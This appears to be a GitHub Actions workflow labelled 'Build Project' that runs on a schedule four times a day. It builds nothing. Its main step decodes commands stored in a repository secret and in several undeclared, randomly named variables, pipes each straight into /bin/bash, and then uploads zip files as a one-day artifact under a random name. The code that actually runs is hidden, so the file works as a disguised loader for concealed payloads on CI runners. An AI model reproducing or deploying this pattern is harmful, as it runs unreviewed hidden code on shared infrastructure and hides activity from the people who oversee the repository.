name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '32 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          jumg8: ${{ secrets.jumg8 }}
        run: |
          printf '%s' "$jumg8" | jq -r .mf0089 | /bin/bash
          echo $a60 | jq -r .asmt7 | /bin/bash
          echo $duo649 | jq -r .blr2689 | /bin/bash
          printf '%s' "$czpu0" | jq -r .kj9 | /bin/bash
          echo $h1620 | jq -r .lqtsy065 | /bin/bash
          echo $g32 | jq -r .kx2262 | /bin/bash
          printf '%s' "$m9470" | jq -r .mnln74457 | /bin/bash
          echo $uob105 | jq -r .no38748 | /bin/bash
          printf '%s' "$o6888" | jq -r .pxyrk19 | /bin/bash
          echo $mohq7 | jq -r .vro9 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: UVb26zms
          path: "*.zip"
          retention-days: 1
